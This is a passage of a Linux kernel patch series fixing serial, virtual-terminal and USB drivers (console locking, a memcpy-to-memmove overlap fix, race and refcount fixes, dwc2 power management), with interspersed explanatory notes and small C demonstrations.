+ 		inb_p(ICP);
+ 	}
+ 
+-	if (uart_console(port))
+-		console_lock();
+-
+ 	/* forget possible initially masked and pending IRQ */
+ 	probe_irq_off(probe_irq_on());
+ 	save_mcr = serial8250_in_MCR(up);
+@@ -1410,9 +1407,6 @@ static void autoconfig_irq(struct uart_8250_port *up)
+ 	if (port->flags & UPF_FOURPORT)
+ 		outb_p(save_ICP, ICP);
+ 
+-	if (uart_console(port))
+-		console_unlock();
+-
+ 	port->irq = (irq > 0) ? irq : 0;
+ }
+ 
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index c5a9b89c4d313..f94c782638686 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2213,9 +2213,12 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 
+ 	lpuart32_write(&sport->port, bd, UARTBAUD);
+ 	lpuart32_serial_setbrg(sport, baud);
+-	lpuart32_write(&sport->port, modem, UARTMODIR);
+-	lpuart32_write(&sport->port, ctrl, UARTCTRL);
++	/* disable CTS before enabling UARTCTRL_TE to avoid pending idle preamble */
++	lpuart32_write(&sport->port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
+ 	/* restore control register */
++	lpuart32_write(&sport->port, ctrl, UARTCTRL);
++	/* re-enable the CTS if needed */
++	lpuart32_write(&sport->port, modem, UARTMODIR);
+ 
+ 	if ((ctrl & (UARTCTRL_PE | UARTCTRL_M)) == UARTCTRL_PE)
+ 		sport->is_cs7 = true;
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index f8962a3d44216..573bf7e9b7978 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -496,8 +496,7 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ 	}
+ }
+ 
+-/* called with port.lock taken and irqs off */
+-static void imx_uart_stop_rx(struct uart_port *port)
++static void imx_uart_stop_rx_with_loopback_ctrl(struct uart_port *port, bool loopback)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+ 	u32 ucr1, ucr2, ucr4, uts;
+@@ -519,7 +518,7 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
+ 	if (port->rs485.flags & SER_RS485_ENABLED &&
+ 	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
+-	    sport->have_rtscts && !sport->have_rtsgpio) {
++	    sport->have_rtscts && !sport->have_rtsgpio && loopback) {
+ 		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
+ 		uts |= UTS_LOOP;
+ 		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
+@@ -531,6 +530,16 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ }
+ 
++/* called with port.lock taken and irqs off */
++static void imx_uart_stop_rx(struct uart_port *port)
++{
++	/*
++	 * Stop RX and enable loopback in order to make sure RS485 bus
++	 * is not blocked. See comment in imx_uart_probe().
++	 */
++	imx_uart_stop_rx_with_loopback_ctrl(port, true);
++}
++
+ /* called with port.lock taken and irqs off */
+ static void imx_uart_enable_ms(struct uart_port *port)
+ {
+@@ -719,8 +728,13 @@ static void imx_uart_start_tx(struct uart_port *port)
+ 				imx_uart_rts_inactive(sport, &ucr2);
+ 			imx_uart_writel(sport, ucr2, UCR2);
+ 
++			/*
++			 * Since we are about to transmit, we cannot stop RX
++			 * with loopback enabled because that would just loop
++			 * our transmitted data back to RX.
++			 */
+ 			if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
+-				imx_uart_stop_rx(port);
++				imx_uart_stop_rx_with_loopback_ctrl(port, false);
+ 
+ 			sport->tx_state = WAIT_AFTER_RTS;
+ 
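
[Editor's note] The imx rework extracts the stop-RX body into a helper that takes a loopback flag: the uart_ops entry point imx_uart_stop_rx() keeps its signature and always enables loopback, while the transmit path opts out so outgoing data is not echoed straight back into RX. The extract-a-flagged-helper shape in a minimal sketch (names are illustrative):

#include <stdbool.h>
#include <stdio.h>

static void stop_rx_ctrl(bool loopback)
{
	printf("stop RX%s\n", loopback ? " + loopback" : "");
}

/* The original entry point keeps its behavior and its signature. */
static void stop_rx(void)
{
	stop_rx_ctrl(true);
}

static void start_tx(void)
{
	/* About to transmit: looping RX back would echo our own data. */
	stop_rx_ctrl(false);
	printf("start TX\n");
}

int main(void)
{
	stop_rx();
	start_tx();
	return 0;
}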
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 444f89eb2d4b7..d409ef3887212 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -1633,13 +1633,16 @@ static unsigned short max310x_i2c_slave_addr(unsigned short addr,
+ 
+ static int max310x_i2c_probe(struct i2c_client *client)
+ {
+-	const struct max310x_devtype *devtype =
+-			device_get_match_data(&client->dev);
++	const struct max310x_devtype *devtype;
+ 	struct i2c_client *port_client;
+ 	struct regmap *regmaps[4];
+ 	unsigned int i;
+ 	u8 port_addr;
+ 
++	devtype = device_get_match_data(&client->dev);
++	if (!devtype)
++		return dev_err_probe(&client->dev, -ENODEV, "Failed to match device\n");
++
+ 	if (client->addr < devtype->slave_addr.min ||
+ 		client->addr > devtype->slave_addr.max)
+ 		return dev_err_probe(&client->dev, -EINVAL,
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index f0ed30d0a697c..fe3f1d655dfe2 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -2561,7 +2561,12 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 			port->type = PORT_UNKNOWN;
+ 			flags |= UART_CONFIG_TYPE;
+ 		}
++		/* Synchronize with possible boot console. */
++		if (uart_console(port))
++			console_lock();
+ 		port->ops->config_port(port, flags);
++		if (uart_console(port))
++			console_unlock();
+ 	}
+ 
+ 	if (port->type != PORT_UNKNOWN) {
+@@ -2569,6 +2574,10 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 
+ 		uart_report_port(drv, port);
+ 
++		/* Synchronize with possible boot console. */
++		if (uart_console(port))
++			console_lock();
++
+ 		/* Power up port for set_mctrl() */
+ 		uart_change_pm(state, UART_PM_STATE_ON);
+ 
+@@ -2585,6 +2594,9 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 
+ 		uart_rs485_config(port);
+ 
++		if (uart_console(port))
++			console_unlock();
++
+ 		/*
+ 		 * If this driver supports console, and it hasn't been
+ 		 * successfully registered yet, try to re-register it.
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 9e30ef2b6eb8c..48a9ed7c93c97 100644
+--- a/drivers/tty/vt/vt.c
++++ b/drivers/tty/vt/vt.c
+@@ -398,7 +398,7 @@ static void vc_uniscr_delete(struct vc_data *vc, unsigned int nr)
+ 		char32_t *ln = uniscr->lines[vc->state.y];
+ 		unsigned int x = vc->state.x, cols = vc->vc_cols;
+ 
+-		memcpy(&ln[x], &ln[x + nr], (cols - x - nr) * sizeof(*ln));
++		memmove(&ln[x], &ln[x + nr], (cols - x - nr) * sizeof(*ln));
+ 		memset32(&ln[cols - nr], ' ', nr);
+ 	}
+ }
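
[Editor's note] The one-word fix matters because source and destination overlap: &ln[x] and &ln[x + nr] point into the same row, memcpy() has undefined behavior for overlapping regions, and memmove() copies as if through a temporary buffer. A runnable demonstration of the same left shift:

#include <stdio.h>
#include <string.h>

int main(void)
{
	char row[] = "abcdefgh";

	/* Delete 2 characters at index 1: shift the tail left over itself.
	 * The regions [1..6] and [3..8] overlap, so memmove() is required. */
	memmove(&row[1], &row[3], strlen(row) - 3 + 1);

	printf("%s\n", row);	/* prints "adefgh" */
	return 0;
}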
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index 1f0951be15ab7..fdc1a66b129a4 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -485,6 +485,7 @@ static ssize_t wdm_write
+ static int service_outstanding_interrupt(struct wdm_device *desc)
+ {
+ 	int rv = 0;
++	int used;
+ 
+ 	/* submit read urb only if the device is waiting for it */
+ 	if (!desc->resp_count || !--desc->resp_count)
+@@ -499,7 +500,10 @@ static int service_outstanding_interrupt(struct wdm_device *desc)
+ 		goto out;
+ 	}
+ 
+-	set_bit(WDM_RESPONDING, &desc->flags);
++	used = test_and_set_bit(WDM_RESPONDING, &desc->flags);
++	if (used)
++		goto out;
++
+ 	spin_unlock_irq(&desc->iuspin);
+ 	rv = usb_submit_urb(desc->response, GFP_KERNEL);
+ 	spin_lock_irq(&desc->iuspin);
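
[Editor's note] test_and_set_bit() atomically claims WDM_RESPONDING and reports whether the bit was already set, so two paths racing to resubmit the response URB collapse into a single submission. A userspace sketch of the claim-or-back-off pattern using C11 atomics (the flag name and layout are illustrative):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

#define RESPONDING	(1u << 0)

static atomic_uint flags;

/* Returns true only for the caller that actually claimed the bit. */
static bool claim_responding(void)
{
	unsigned int old = atomic_fetch_or(&flags, RESPONDING);

	return !(old & RESPONDING);
}

int main(void)
{
	printf("first caller submits: %d\n", claim_responding());
	printf("racing caller backs off: %d\n", claim_responding());
	return 0;
}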
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index d960a56b760ec..b1fb04e5247c3 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -123,7 +123,6 @@ EXPORT_SYMBOL_GPL(ehci_cf_port_reset_rwsem);
+ #define HUB_DEBOUNCE_STEP	  25
+ #define HUB_DEBOUNCE_STABLE	 100
+ 
+-static void hub_release(struct kref *kref);
+ static int usb_reset_and_verify_device(struct usb_device *udev);
+ static int hub_port_disable(struct usb_hub *hub, int port1, int set_state);
+ static bool hub_port_warm_reset_required(struct usb_hub *hub, int port1,
+@@ -685,14 +684,14 @@ static void kick_hub_wq(struct usb_hub *hub)
+ 	 */
+ 	intf = to_usb_interface(hub->intfdev);
+ 	usb_autopm_get_interface_no_resume(intf);
+-	kref_get(&hub->kref);
++	hub_get(hub);
+ 
+ 	if (queue_work(hub_wq, &hub->events))
+ 		return;
+ 
+ 	/* the work has already been scheduled */
+ 	usb_autopm_put_interface_async(intf);
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ void usb_kick_hub_wq(struct usb_device *hdev)
+@@ -1060,7 +1059,7 @@ static void hub_activate(struct usb_hub *hub, enum hub_activation_type type)
+ 			goto init2;
+ 		goto init3;
+ 	}
+-	kref_get(&hub->kref);
++	hub_get(hub);
+ 
+ 	/* The superspeed hub except for root hub has to use Hub Depth
+ 	 * value as an offset into the route string to locate the bits
+@@ -1308,7 +1307,7 @@ static void hub_activate(struct usb_hub *hub, enum hub_activation_type type)
+ 		device_unlock(&hdev->dev);
+ 	}
+ 
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ /* Implement the continuations for the delays above */
+@@ -1724,6 +1723,16 @@ static void hub_release(struct kref *kref)
+ 	kfree(hub);
+ }
+ 
++void hub_get(struct usb_hub *hub)
++{
++	kref_get(&hub->kref);
++}
++
++void hub_put(struct usb_hub *hub)
++{
++	kref_put(&hub->kref, hub_release);
++}
++
+ static unsigned highspeed_hubs;
+ 
+ static void hub_disconnect(struct usb_interface *intf)
+@@ -1772,7 +1781,7 @@ static void hub_disconnect(struct usb_interface *intf)
+ 
+ 	onboard_hub_destroy_pdevs(&hub->onboard_hub_devs);
+ 
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ static bool hub_descriptor_is_sane(struct usb_host_interface *desc)
+@@ -5874,7 +5883,7 @@ static void hub_event(struct work_struct *work)
+ 
+ 	/* Balance the stuff in kick_hub_wq() and allow autosuspend */
+ 	usb_autopm_put_interface(intf);
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ 
+ 	kcov_remote_stop();
+ }
+diff --git a/drivers/usb/core/hub.h b/drivers/usb/core/hub.h
+index bc66205ca52c3..1085c72335d5c 100644
+--- a/drivers/usb/core/hub.h
++++ b/drivers/usb/core/hub.h
+@@ -118,6 +118,8 @@ extern void usb_hub_remove_port_device(struct usb_hub *hub,
+ extern int usb_hub_set_port_power(struct usb_device *hdev, struct usb_hub *hub,
+ 		int port1, bool set);
+ extern struct usb_hub *usb_hub_to_struct_hub(struct usb_device *hdev);
++extern void hub_get(struct usb_hub *hub);
++extern void hub_put(struct usb_hub *hub);
+ extern int hub_port_debounce(struct usb_hub *hub, int port1,
+ 		bool must_be_connected);
+ extern int usb_clear_port_feature(struct usb_device *hdev,
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index 38c1a4f4fdeae..e91fa567d08d2 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -28,11 +28,22 @@ static ssize_t disable_show(struct device *dev,
+ 	u16 portstatus, unused;
+ 	bool disabled;
+ 	int rc;
++	struct kernfs_node *kn;
+ 
++	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+-		return rc;
++		goto out_hub_get;
+ 
++	/*
++	 * Prevent deadlock if another process is concurrently
++	 * trying to unregister hdev.
++	 */
++	kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++	if (!kn) {
++		rc = -ENODEV;
++		goto out_autopm;
++	}
+ 	usb_lock_device(hdev);
+ 	if (hub->disconnected) {
+ 		rc = -ENODEV;
+@@ -42,9 +53,13 @@ static ssize_t disable_show(struct device *dev,
+ 	usb_hub_port_status(hub, port1, &portstatus, &unused);
+ 	disabled = !usb_port_is_power_on(hub, portstatus);
+ 
+-out_hdev_lock:
++ out_hdev_lock:
+ 	usb_unlock_device(hdev);
++	sysfs_unbreak_active_protection(kn);
++ out_autopm:
+ 	usb_autopm_put_interface(intf);
++ out_hub_get:
++	hub_put(hub);
+ 
+ 	if (rc)
+ 		return rc;
+@@ -62,15 +77,26 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	int port1 = port_dev->portnum;
+ 	bool disabled;
+ 	int rc;
++	struct kernfs_node *kn;
+ 
+ 	rc = strtobool(buf, &disabled);
+ 	if (rc)
+ 		return rc;
+ 
++	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+-		return rc;
++		goto out_hub_get;
+ 
++	/*
++	 * Prevent deadlock if another process is concurrently
++	 * trying to unregister hdev.
++	 */
++	kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++	if (!kn) {
++		rc = -ENODEV;
++		goto out_autopm;
++	}
+ 	usb_lock_device(hdev);
+ 	if (hub->disconnected) {
+ 		rc = -ENODEV;
+@@ -91,9 +117,13 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	if (!rc)
+ 		rc = count;
+ 
+-out_hdev_lock:
++ out_hdev_lock:
+ 	usb_unlock_device(hdev);
++	sysfs_unbreak_active_protection(kn);
++ out_autopm:
+ 	usb_autopm_put_interface(intf);
++ out_hub_get:
++	hub_put(hub);
+ 
+ 	return rc;
+ }
+@@ -534,7 +564,7 @@ static int match_location(struct usb_device *peer_hdev, void *p)
+ 	struct usb_hub *peer_hub = usb_hub_to_struct_hub(peer_hdev);
+ 	struct usb_device *hdev = to_usb_device(port_dev->dev.parent->parent);
+ 
+-	if (!peer_hub)
++	if (!peer_hub || port_dev->connect_type == USB_PORT_NOT_USED)
+ 		return 0;
+ 
+ 	hcd = bus_to_hcd(hdev->bus);
+@@ -545,7 +575,8 @@ static int match_location(struct usb_device *peer_hdev, void *p)
+ 
+ 	for (port1 = 1; port1 <= peer_hdev->maxchild; port1++) {
+ 		peer = peer_hub->ports[port1 - 1];
+-		if (peer && peer->location == port_dev->location) {
++		if (peer && peer->connect_type != USB_PORT_NOT_USED &&
++		    peer->location == port_dev->location) {
+ 			link_peers_report(port_dev, peer);
+ 			return 1; /* done */
+ 		}
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index ccf6cd9722693..5f1e07341f363 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -1170,14 +1170,24 @@ static ssize_t interface_authorized_store(struct device *dev,
+ {
+ 	struct usb_interface *intf = to_usb_interface(dev);
+ 	bool val;
++	struct kernfs_node *kn;
+ 
+ 	if (strtobool(buf, &val) != 0)
+ 		return -EINVAL;
+ 
+-	if (val)
++	if (val) {
+ 		usb_authorize_interface(intf);
+-	else
+-		usb_deauthorize_interface(intf);
++	} else {
++		/*
++		 * Prevent deadlock if another process is concurrently
++		 * trying to unregister intf.
++		 */
++		kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++		if (kn) {
++			usb_deauthorize_interface(intf);
++			sysfs_unbreak_active_protection(kn);
++		}
++	}
+ 
+ 	return count;
+ }
+diff --git a/drivers/usb/dwc2/core.h b/drivers/usb/dwc2/core.h
+index 40cf2880d7e59..b106c0e0b77ba 100644
+--- a/drivers/usb/dwc2/core.h
++++ b/drivers/usb/dwc2/core.h
+@@ -729,8 +729,14 @@ struct dwc2_dregs_backup {
+  * struct dwc2_hregs_backup - Holds host registers state before
+  * entering partial power down
+  * @hcfg:		Backup of HCFG register
++ * @hflbaddr:		Backup of HFLBADDR register
+  * @haintmsk:		Backup of HAINTMSK register
++ * @hcchar:		Backup of HCCHAR register
++ * @hcsplt:		Backup of HCSPLT register
+  * @hcintmsk:		Backup of HCINTMSK register
++ * @hctsiz:		Backup of HCTSIZ register
++ * @hcidma:		Backup of HCDMA register
++ * @hcidmab:		Backup of HCDMAB register
+  * @hprt0:		Backup of HPTR0 register
+  * @hfir:		Backup of HFIR register
+  * @hptxfsiz:		Backup of HPTXFSIZ register
+@@ -738,8 +744,14 @@ struct dwc2_dregs_backup {
+  */
+ struct dwc2_hregs_backup {
+ 	u32 hcfg;
++	u32 hflbaddr;
+ 	u32 haintmsk;
++	u32 hcchar[MAX_EPS_CHANNELS];
++	u32 hcsplt[MAX_EPS_CHANNELS];
+ 	u32 hcintmsk[MAX_EPS_CHANNELS];
++	u32 hctsiz[MAX_EPS_CHANNELS];
++	u32 hcidma[MAX_EPS_CHANNELS];
++	u32 hcidmab[MAX_EPS_CHANNELS];
+ 	u32 hprt0;
+ 	u32 hfir;
+ 	u32 hptxfsiz;
+@@ -1084,6 +1096,7 @@ struct dwc2_hsotg {
+ 	bool needs_byte_swap;
+ 
+ 	/* DWC OTG HW Release versions */
++#define DWC2_CORE_REV_4_30a	0x4f54430a
+ #define DWC2_CORE_REV_2_71a	0x4f54271a
+ #define DWC2_CORE_REV_2_72a     0x4f54272a
+ #define DWC2_CORE_REV_2_80a	0x4f54280a
+@@ -1321,6 +1334,7 @@ int dwc2_backup_global_registers(struct dwc2_hsotg *hsotg);
+ int dwc2_restore_global_registers(struct dwc2_hsotg *hsotg);
+ 
+ void dwc2_enable_acg(struct dwc2_hsotg *hsotg);
++void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg, bool remotewakeup);
+ 
+ /* This function should be called on every hardware interrupt. */
+ irqreturn_t dwc2_handle_common_intr(int irq, void *dev);
+diff --git a/drivers/usb/dwc2/core_intr.c b/drivers/usb/dwc2/core_intr.c
+index 158ede7538548..26d752a4c3ca9 100644
+--- a/drivers/usb/dwc2/core_intr.c
++++ b/drivers/usb/dwc2/core_intr.c
+@@ -297,7 +297,8 @@ static void dwc2_handle_session_req_intr(struct dwc2_hsotg *hsotg)
+ 
+ 			/* Exit gadget mode clock gating. */
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		}
+ 
+@@ -322,10 +323,11 @@ static void dwc2_handle_session_req_intr(struct dwc2_hsotg *hsotg)
+  * @hsotg: Programming view of DWC_otg controller
+  *
+  */
+-static void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg)
++void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg, bool remotewakeup)
+ {
+ 	u32 glpmcfg;
+-	u32 i = 0;
++	u32 pcgctl;
++	u32 dctl;
+ 
+ 	if (hsotg->lx_state != DWC2_L1) {
+ 		dev_err(hsotg->dev, "Core isn't in DWC2_L1 state\n");
+@@ -334,37 +336,57 @@ static void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg)
+ 
+ 	glpmcfg = dwc2_readl(hsotg, GLPMCFG);
+ 	if (dwc2_is_device_mode(hsotg)) {
+-		dev_dbg(hsotg->dev, "Exit from L1 state\n");
++		dev_dbg(hsotg->dev, "Exit from L1 state, remotewakeup=%d\n", remotewakeup);
+ 		glpmcfg &= ~GLPMCFG_ENBLSLPM;
+-		glpmcfg &= ~GLPMCFG_HIRD_THRES_EN;
++		glpmcfg &= ~GLPMCFG_HIRD_THRES_MASK;
+ 		dwc2_writel(hsotg, glpmcfg, GLPMCFG);
+ 
+-		do {
+-			glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		pcgctl = dwc2_readl(hsotg, PCGCTL);
++		pcgctl &= ~PCGCTL_ENBL_SLEEP_GATING;
++		dwc2_writel(hsotg, pcgctl, PCGCTL);
+ 
+-			if (!(glpmcfg & (GLPMCFG_COREL1RES_MASK |
+-					 GLPMCFG_L1RESUMEOK | GLPMCFG_SLPSTS)))
+-				break;
++		glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		if (glpmcfg & GLPMCFG_ENBESL) {
++			glpmcfg |= GLPMCFG_RSTRSLPSTS;
++			dwc2_writel(hsotg, glpmcfg, GLPMCFG);
++		}
++
++		if (remotewakeup) {
++			if (dwc2_hsotg_wait_bit_set(hsotg, GLPMCFG, GLPMCFG_L1RESUMEOK, 1000)) {
++				dev_warn(hsotg->dev, "%s: timeout GLPMCFG_L1RESUMEOK\n", __func__);
++				goto fail;
++			}
++
++			dctl = dwc2_readl(hsotg, DCTL);
++			dctl |= DCTL_RMTWKUPSIG;
++			dwc2_writel(hsotg, dctl, DCTL);
+ 
+-			udelay(1);
+-		} while (++i < 200);
++			if (dwc2_hsotg_wait_bit_set(hsotg, GINTSTS, GINTSTS_WKUPINT, 1000)) {
++				dev_warn(hsotg->dev, "%s: timeout GINTSTS_WKUPINT\n", __func__);
++				goto fail;
++			}
++		}
+ 
+-		if (i == 200) {
+-			dev_err(hsotg->dev, "Failed to exit L1 sleep state in 200us.\n");
++		glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		if (glpmcfg & GLPMCFG_COREL1RES_MASK || glpmcfg & GLPMCFG_SLPSTS ||
++		    glpmcfg & GLPMCFG_L1RESUMEOK) {
++			goto fail;
+ 		}
+-		dwc2_gadget_init_lpm(hsotg);
++
++		/* Inform gadget to exit from L1 */
++		call_gadget(hsotg, resume);
++		/* Change to L0 state */
++		hsotg->lx_state = DWC2_L0;
++		hsotg->bus_suspended = false;
++fail:
++		dwc2_gadget_init_lpm(hsotg);
+ 	} else {
+ 		/* TODO */
+ 		dev_err(hsotg->dev, "Host side LPM is not supported.\n");
+ 		return;
+ 	}
+-
+-	/* Change to L0 state */
+-	hsotg->lx_state = DWC2_L0;
+-
+-	/* Inform gadget to exit from L1 */
+-	call_gadget(hsotg, resume);
+ }
+ 
+ /*
+@@ -385,7 +407,7 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 	dev_dbg(hsotg->dev, "%s lxstate = %d\n", __func__, hsotg->lx_state);
+ 
+ 	if (hsotg->lx_state == DWC2_L1) {
+-		dwc2_wakeup_from_lpm_l1(hsotg);
++		dwc2_wakeup_from_lpm_l1(hsotg, false);
+ 		return;
+ 	}
+ 
+@@ -408,7 +430,8 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 
+ 			/* Exit gadget mode clock gating. */
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		} else {
+ 			/* Change to L0 state */
+@@ -425,7 +448,8 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 			}
+ 
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_host_exit_clock_gating(hsotg, 1);
+ 
+ 			/*
+diff --git a/drivers/usb/dwc2/gadget.c b/drivers/usb/dwc2/gadget.c
+index 8b15742d9e8aa..cb29f9fae2f23 100644
+--- a/drivers/usb/dwc2/gadget.c
++++ b/drivers/usb/dwc2/gadget.c
+@@ -1416,6 +1416,10 @@ static int dwc2_hsotg_ep_queue(struct usb_ep *ep, struct usb_request *req,
+ 		ep->name, req, req->length, req->buf, req->no_interrupt,
+ 		req->zero, req->short_not_ok);
+ 
++	if (hs->lx_state == DWC2_L1) {
++		dwc2_wakeup_from_lpm_l1(hs, true);
++	}
++
+ 	/* Prevent new request submission when controller is suspended */
+ 	if (hs->lx_state != DWC2_L0) {
+ 		dev_dbg(hs->dev, "%s: submit request only in active state\n",
+@@ -3728,6 +3732,12 @@ static irqreturn_t dwc2_hsotg_irq(int irq, void *pw)
+ 		if (hsotg->in_ppd && hsotg->lx_state == DWC2_L2)
+ 			dwc2_exit_partial_power_down(hsotg, 0, true);
+ 
++		/* Exit gadget mode clock gating. */
++		if (hsotg->params.power_down ==
++		    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++		    !hsotg->params.no_clock_gating)
++			dwc2_gadget_exit_clock_gating(hsotg, 0);
++
+ 		hsotg->lx_state = DWC2_L0;
+ 	}
+ 
+diff --git a/drivers/usb/dwc2/hcd.c b/drivers/usb/dwc2/hcd.c
+index 35c7a4df8e717..dd5b1c5691e11 100644
+--- a/drivers/usb/dwc2/hcd.c
++++ b/drivers/usb/dwc2/hcd.c
+@@ -2701,8 +2701,11 @@ enum dwc2_transaction_type dwc2_hcd_select_transactions(
+ 			hsotg->available_host_channels--;
+ 		}
+ 		qh = list_entry(qh_ptr, struct dwc2_qh, qh_list_entry);
+-		if (dwc2_assign_and_init_hc(hsotg, qh))
++		if (dwc2_assign_and_init_hc(hsotg, qh)) {
++			if (hsotg->params.uframe_sched)
++				hsotg->available_host_channels++;
+ 			break;
++		}
+ 
+ 		/*
+ 		 * Move the QH from the periodic ready schedule to the
+@@ -2735,8 +2738,11 @@ enum dwc2_transaction_type dwc2_hcd_select_transactions(
+ 			hsotg->available_host_channels--;
+ 		}
+ 
+-		if (dwc2_assign_and_init_hc(hsotg, qh))
++		if (dwc2_assign_and_init_hc(hsotg, qh)) {
++			if (hsotg->params.uframe_sched)
++				hsotg->available_host_channels++;
+ 			break;
++		}
+ 
+ 		/*
+ 		 * Move the QH from the non-periodic inactive schedule to the
+@@ -4143,6 +4149,8 @@ void dwc2_host_complete(struct dwc2_hsotg *hsotg, struct dwc2_qtd *qtd,
+ 			 urb->actual_length);
+ 
+ 	if (usb_pipetype(urb->pipe) == PIPE_ISOCHRONOUS) {
++		if (!hsotg->params.dma_desc_enable)
++			urb->start_frame = qtd->qh->start_active_frame;
+ 		urb->error_count = dwc2_hcd_urb_get_error_count(qtd->urb);
+ 		for (i = 0; i < urb->number_of_packets; ++i) {
+ 			urb->iso_frame_desc[i].actual_length =
+@@ -4649,7 +4657,7 @@ static int _dwc2_hcd_urb_enqueue(struct usb_hcd *hcd, struct urb *urb,
+ 	}
+ 
+ 	if (hsotg->params.power_down == DWC2_POWER_DOWN_PARAM_NONE &&
+-	    hsotg->bus_suspended) {
++	    hsotg->bus_suspended && !hsotg->params.no_clock_gating) {
+ 		if (dwc2_is_device_mode(hsotg))
+ 			dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		else
+@@ -5406,9 +5414,16 @@ int dwc2_backup_host_registers(struct dwc2_hsotg *hsotg)
+ 	/* Backup Host regs */
+ 	hr = &hsotg->hr_backup;
+ 	hr->hcfg = dwc2_readl(hsotg, HCFG);
++	hr->hflbaddr = dwc2_readl(hsotg, HFLBADDR);
+ 	hr->haintmsk = dwc2_readl(hsotg, HAINTMSK);
+-	for (i = 0; i < hsotg->params.host_channels; ++i)
++	for (i = 0; i < hsotg->params.host_channels; ++i) {
++		hr->hcchar[i] = dwc2_readl(hsotg, HCCHAR(i));
++		hr->hcsplt[i] = dwc2_readl(hsotg, HCSPLT(i));
+ 		hr->hcintmsk[i] = dwc2_readl(hsotg, HCINTMSK(i));
++		hr->hctsiz[i] = dwc2_readl(hsotg, HCTSIZ(i));
++		hr->hcidma[i] = dwc2_readl(hsotg, HCDMA(i));
++		hr->hcidmab[i] = dwc2_readl(hsotg, HCDMAB(i));
++	}
+ 
+ 	hr->hprt0 = dwc2_read_hprt0(hsotg);
+ 	hr->hfir = dwc2_readl(hsotg, HFIR);
+@@ -5442,10 +5457,17 @@ int dwc2_restore_host_registers(struct dwc2_hsotg *hsotg)
+ 	hr->valid = false;
+ 
+ 	dwc2_writel(hsotg, hr->hcfg, HCFG);
++	dwc2_writel(hsotg, hr->hflbaddr, HFLBADDR);
